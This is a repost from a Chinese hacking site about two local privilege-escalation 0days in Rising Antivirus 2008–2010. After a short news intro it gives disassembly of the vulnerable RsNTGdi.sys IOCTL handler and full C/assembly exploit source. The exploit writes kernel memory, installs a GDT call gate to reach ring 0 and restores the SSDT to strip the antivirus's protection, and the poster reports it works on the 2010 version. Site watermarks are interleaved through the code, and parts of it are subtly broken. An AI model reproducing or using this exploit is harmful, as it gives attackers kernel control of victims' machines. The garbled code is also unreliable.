前言:波兰一家安全组织(www.ntinternals.org)近日公布:瑞星杀毒软件长期存在两个“本地提权”0day安全漏洞,使木马病毒能轻易获得
瑞星用户的系统控制权。国内安全厂商金山和360的技术专家均已确认了这两个漏洞的存在,一旦受到黑客攻击,数千万瑞星用户将丧失对木马病毒的
防御能力,并将导致国内大批政府与企业内网的信息安全面临严重威胁。 www.hack6.com
曝光者说,瑞星杀毒的这两个漏洞涉及瑞星杀毒软件2008、2009、2010等主要版本,而且利用方式简单、稳定,能使黑客在攻击瑞星用户时获得系统
最高权限。金山工程师李铁军说,这两个漏洞有可能被黑客利用来制造“批量抓鸡工具”;360的石小洪则在电话采访中表示,如果这类漏洞被黑客大
规模利用,会严重威胁到瑞星个人用户的账号和隐私安全。另外一家企业级安全厂商的技术人员谈到了一种更严重的可能性:使用瑞星杀毒的政府机
构和企业用户很可能因此被黑客渗透到内网中,从而危及这类机构的信息安全。
据发现漏洞的国外组织透露,该组织早在2008年9月和2009年4月分别将两个漏洞信息报告给瑞星,但迟迟没看到瑞星修复漏洞,因此才将技术细节曝
光。鉴于漏洞信息已经公开,按照历次0day漏洞攻击爆发的规律,相应的攻击代码很可能会在今后几天内大面积扩散。
截至目前,瑞星公司尚未对有关漏洞一事作出官方回应,也未对用户发布紧急提示。瑞星杀毒软件漏洞的相关信息已在国内相关论坛传播。
本文来自hack6谜领域
复制代码
Kernel module (RsNTGdi.sys) shipped with RISING Antivirus 2008/2009 contains vulnerabilities in the code that handles IOCTL requests. Local exploitation of multiple vulnerabilities allow an attacker to execute arbitrary code in kernel context. .text:0001036E ; int __stdcall DispatchControl(int DeviceObject, PIRP Irp)
.text:0001036E DispatchControl proc near www.hack6.com
.text:0001036E 本文来自hack6谜领域
.text:0001036E NtStatus = dword ptr -4 www.hack6.com
.text:0001036E DeviceObject = dword ptr 8
.text:0001036E Irp = dword ptr 0Ch 内容来自www.hack6.com
.text:0001036E push ebp .text:0001036F mov ebp, esp本文来自hack6谜领域
.text:00010371 push ecx 本文来自hack6谜领域
.text:00010372 push ebx
.text:00010373 push esi 内容来自www.hack6.com
.text:00010374 mov esi, [ebp+Irp] 内容来自www.hack6.com
.text:00010377 and [ebp+NtStatus], 0 内容来自www.hack6.com
.text:0001037B push edi .text:0001037C mov ecx, [esi+60h]
.text:0001037F and dword ptr [esi+1Ch], 0
.text:00010383 mov edi, [esi+3Ch]
.text:00010386 mov eax, [ecx+10h] www.hack6.com
.text:00010389 mov edx, [ecx+8]
.text:0001038C mov ebx, [ecx+4] 本文来自hack6谜领域
.text:0001038F mov ecx, [ecx+0Ch]
.text:00010392 cmp ecx, 83003C03h
.text:00010398 mov [ebp+Irp], ebx
.text:0001039B jz @@ioctl_83003C03
.text:000103A1 cmp ecx, 83003C07h
.text:000103A7 jz @@ioctl_83003C07 本文来自hack6谜领域
.text:000103AD cmp ecx, 83003C0Bh
.text:000103B3 jz @@ioctl_83003C0B .text:000103B9 cmp ecx, 83003C0Fh
.text:000103BF jz short @@ioctl_83003C0F
.text:000103C1 cmp ecx, 83003C13h
.text:000103C7 jz short @@ioctl_83003C13
.text:000103C9 cmp ecx, 83003C17h
.text:000103CF jz short @@ioctl_83003C17
.text:000103D1 mov [ebp+NtStatus], 0C000000Dh
.text:000103D8 jmp @@complete_request www.hack6.com
... 内容来自www.hack6.com
.text:00010458 @@ioctl_83003C0B: 内容来自www.hack6.com
.text:00010458 push 4
www.hack6.com
.text:0001045A pop ebx
内容来自www.hack6.com
.text:0001045B cmp edx, ebx 内容来自www.hack6.com
.text:0001045D jb short @@complete_request www.hack6.com
.text:0001045F cmp [ebp+Irp], ebx
.text:00010462 jb short @@complete_request www.hack6.com
.text:00010464 push dword ptr [eax] 本文来自hack6谜领域
.text:00010466 call VidSetTextColor
.text:0001046B mov [edi], eax 本文来自hack6谜领域
.text:0001046D mov [esi+1Ch], ebx
.text:00010470 jmp short @@complete_request 内容来自www.hack6.com
----------------------------------------------------------------------------------------本文来自hack6谜领域
VC代码]瑞星本地漏洞利用代码
编译后,运行此程序,可在ring3下直接恢复其ssdt,然后就可以为所欲为了,刚才测试1月28日对瑞星2010版有效,据说也适用于2009和2008版本 复制内容到剪贴板
代码: 本文来自hack6谜领域
//My website:http://www.hack6.com 内容来自www.hack6.com
//MY QQ:283422135
//VC-ConsoleWithApi
#include "stdafx.h"
#include "windows.h"
enum { SystemModuleInformation = 11 };
typedef struct {
ULONG Unknown1;
ULONG Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
HANDLE g_RsGdiHandle = 0 ;
void __stdcall WriteKVM(PVOID Address , ULONG Value)
{
ULONG ColorValue = Value ;
ULONG btr ;
ULONG ColorBuffer = 0 ;
DeviceIoControl(g_RsGdiHandle ,
0x83003C0B,
&ColorValue ,
sizeof(ULONG),
&ColorBuffer ,
sizeof(ULONG),
&btr ,
0
);
DeviceIoControl(g_RsGdiHandle ,
0x83003C0B,
&ColorValue ,
sizeof(ULONG),
Address ,
sizeof(ULONG),
&btr ,
0
);
return ;
}
void AddCallGate()
{
ULONG Gdt_Addr;
ULONG CallGateData[0x4];
ULONG Icount;
__asm
{
push edx
sgdt [esp-2]
pop edx
mov Gdt_Addr , edx
}
__asm
{ 本文来自hack6谜领域
push 0xc3
push Gdt_Addr
call WriteKVM
mov eax,Gdt_Addr
mov word ptr[CallGateData],ax
shr eax,16
mov word ptr[CallGateData+6],ax
mov dword ptr[CallGateData+2],0x0ec0003e8
mov dword ptr[CallGateData+8],0x0000ffff
mov dword ptr[CallGateData+12],0x00cf9a00
xor eax,eax
LoopWrite:
mov edi,dword ptr CallGateData[eax]
www.hack6.com
push edi
mov edi,Gdt_Addr
add edi,0x3e0
add edi,eax
push edi
mov Icount,eax
call WriteKVM
mov eax,Icount
add eax , 0x4
cmp eax,0x10
jnz LoopWrite
} www.hack6.com
return ;
}
void IntoR0(PVOID function)
{
WORD Callgt[3];
Callgt[0] = 0;
Callgt[1] = 0;
Callgt[2] = 0x3e3;
__asm
{
call fword ptr[Callgt]
mov eax,esp
mov esp,[esp+4]
push eax
call function
pop esp
push offset ring3Ret
retf
ring3Ret:
nop
}
return ;
}
#pragma pack(1)
typedef struct _IDTR
{
SHORT IDTLimit;
UINT IDTBase;
}IDTR,
*PIDTR,
**PPIDTR;
#pragma pack()
ULONG g_RealSSDT = 0 ;
ULONG ServiceNum = 0 ;
ULONG OrgService [0x1000] ;
ULONG RvaToOffset(IMAGE_NT_HEADERS *NT, ULONG Rva)
{
ULONG Offset = Rva, Limit;
IMAGE_SECTION_HEADER *Img;
WORD i;
Img = IMAGE_FIRST_SECTION(NT); 内容来自www.hack6.com
if (Rva < Img->PointerToRawData)
return Rva;
for (i = 0; i < NT->FileHeader.NumberOfSections; i++)
{
if (Img.SizeOfRawData)
Limit = Img.SizeOfRawData;
else
Limit = Img.Misc.VirtualSize;
www.hack6.com
if (Rva >= Img.VirtualAddress &&
Rva < (Img.VirtualAddress + Limit))
{
if (Img.PointerToRawData != 0)
{
Offset -= Img.VirtualAddress;
Offset += Img.PointerToRawData;
}
www.hack6.com
return Offset;
}
} return 0;
}
#define ibaseDD *(PDWORD)&ibase
DWORD GetHeaders(PCHAR ibase, PIMAGE_FILE_HEADER *pfh, PIMAGE_OPTIONAL_HEADER *poh, PIMAGE_SECTION_HEADER *psh)
{
PIMAGE_DOS_HEADER mzhead=(PIMAGE_DOS_HEADER)ibase;
if ((mzhead->e_magic!=IMAGE_DOS_SIGNATURE)||(ibaseDD[mzhead->e_lfanew]!=IMAGE_NT_SIGNATURE)) return FALSE;
*pfh=(PIMAGE_FILE_HEADER)&ibase[mzhead->e_lfanew];
if (((PIMAGE_NT_HEADERS)*pfh)->Signature!=IMAGE_NT_SIGNATURE) return FALSE;
*pfh=(PIMAGE_FILE_HEADER)((PBYTE)*pfh+sizeof(IMAGE_NT_SIGNATURE));
*poh=(PIMAGE_OPTIONAL_HEADER)((PBYTE)*pfh+sizeof(IMAGE_FILE_HEADER));
if ((*poh)->Magic!=IMAGE_NT_OPTIONAL_HDR32_MAGIC) return FALSE;
*psh=(PIMAGE_SECTION_HEADER)((PBYTE)*poh+sizeof(IMAGE_OPTIONAL_HEADER));
return TRUE;
}
typedef struct {
WORD offset:12;
WORD type:4;
} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;
#define RVATOVA(base,offset) ((PVOID)((DWORD)(base)+(DWORD)(offset))) www.hack6.com
DWORD FindKiServiceTable(HMODULE hModule,DWORD dwKSDT , PULONG ImageBase)
{
PIMAGE_FILE_HEADER pfh;
PIMAGE_OPTIONAL_HEADER poh;
PIMAGE_SECTION_HEADER psh;
PIMAGE_BASE_RELOCATION pbr;
PIMAGE_FIXUP_ENTRY pfe;
DWORD dwFixups=0,i,dwPointerRva,dwPointsToRva,dwKiServiceTable;
BOOL bFirstChunk; www.hack6.com
GetHeaders((PCHAR)hModule,&pfh,&poh,&psh); www.hack6.com
if ((poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) &&
(!((pfh->Characteristics)&IMAGE_FILE_RELOCS_STRIPPED))) { pbr=(PIMAGE_BASE_RELOCATION)RVATOVA(poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress,hModule);
bFirstChunk=TRUE;
while (bFirstChunk || pbr->VirtualAddress) {
bFirstChunk=FALSE;
pfe=(PIMAGE_FIXUP_ENTRY)((DWORD)pbr+sizeof(IMAGE_BASE_RELOCATION)); 内容来自www.hack6.com
for (i=0;i<(pbr->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))>>1;i++,pfe++) {
if (pfe->type==IMAGE_REL_BASED_HIGHLOW) {
dwFixups++;
dwPointerRva=pbr->VirtualAddress+pfe->offset;
dwPointsToRva=*(PDWORD)((DWORD)hModule+dwPointerRva)-(DWORD)poh->ImageBase;
if (dwPointsToRva==dwKSDT)
{
if (*(PWORD)((DWORD)hModule+dwPointerRva-2)==0x05c7)
www.hack6.com
{
dwKiServiceTable=*(PDWORD)((DWORD)hModule+dwPointerRva+4)-poh->ImageBase;
*ImageBase = poh->ImageBase;
return dwKiServiceTable;
}
}
}
}
*(PDWORD)&pbr+=pbr->SizeOfBlock;
}
}
return 0;
}
DWORD CR0Reg ;
ULONG realssdt ;
void InKerneProc()
{
__asm
{
cli
mov eax, cr0
mov CR0Reg,eax
and eax,0xFFFEFFFF
mov cr0, eax
}
int i;
for (i = 0; i < (int)ServiceNum; i++)
{
*(ULONG*)(*(ULONG*)realssdt + i * sizeof(ULONG)) = OrgService;
}
__asm
{
mov eax, CR0Reg
mov cr0, eax
sti
}
}
int main(int argc, char* argv[])
{
printf("Rising AntiVirus 2008 ~ 2010 /n"
"Local Privilege Escalation Vulnerability Proof Of Concept Exploit/n 2010-1-27/n");
g_RsGdiHandle = CreateFile("[url=].//RSNTGDI[/url]" ,
0,
FILE_SHARE_READ | FILE_SHARE_WRITE ,
0,
OPEN_EXISTING , 0 , 0 );
if (g_RsGdiHandle == INVALID_HANDLE_VALUE)
{
return 0 ;
}
SYSTEM_MODULE_INFORMATION ModuleInfo ; 本文来自hack6谜领域
// Learn the loaded kernel (e.g. NTKRNLPA vs NTOSKRNL), and it's base address www.hack6.com
HMODULE hlib = GetModuleHandle("ntdll.dll");
PVOID pNtQuerySystemInformation = GetProcAddress(hlib , "NtQuerySystemInformation");
ULONG infosize = sizeof(ModuleInfo); www.hack6.com
__asm
{
push 0
push infosize
lea eax , ModuleInfo
push eax
push 11
call pNtQuerySystemInformation
} www.hack6.com
HMODULE KernelHandle ;
LPCSTR ntosname = (LPCSTR)((ULONG)ModuleInfo.Module[0].ImageName + ModuleInfo.Module[0].PathLength);
// Load the kernel image specified
KernelHandle = LoadLibrary(ntosname);
if (KernelHandle == 0 )
{
return 0 ;
}
ULONG KeSSDT = (ULONG)GetProcAddress(KernelHandle , "KeServiceDescriptorTable");
www.hack6.com
if (KeSSDT == 0 )
{
return 0 ;
}
ULONG ImageBase = 0 ;
ULONG KiSSDT = FindKiServiceTable(KernelHandle , KeSSDT - (ULONG)KernelHandle , &ImageBase);
if (KiSSDT == 0 )
{
return 0 ;
}
KiSSDT += (ULONG)KernelHandle;
ServiceNum = 0x11c ;
ULONG i ;
for (i = 0 ; i < ServiceNum ; i ++)
{
OrgService = *(ULONG*)(KiSSDT + i * sizeof(ULONG)) + (ULONG)ModuleInfo.Module[0].Base - ImageBase;
}
realssdt = KeSSDT - (ULONG)KernelHandle + (ULONG)ModuleInfo.Module[0].Base; SetThreadAffinityMask(GetCurrentThread () , 0 ) ;
AddCallGate();
IntoR0(InKerneProc);
return 0;
}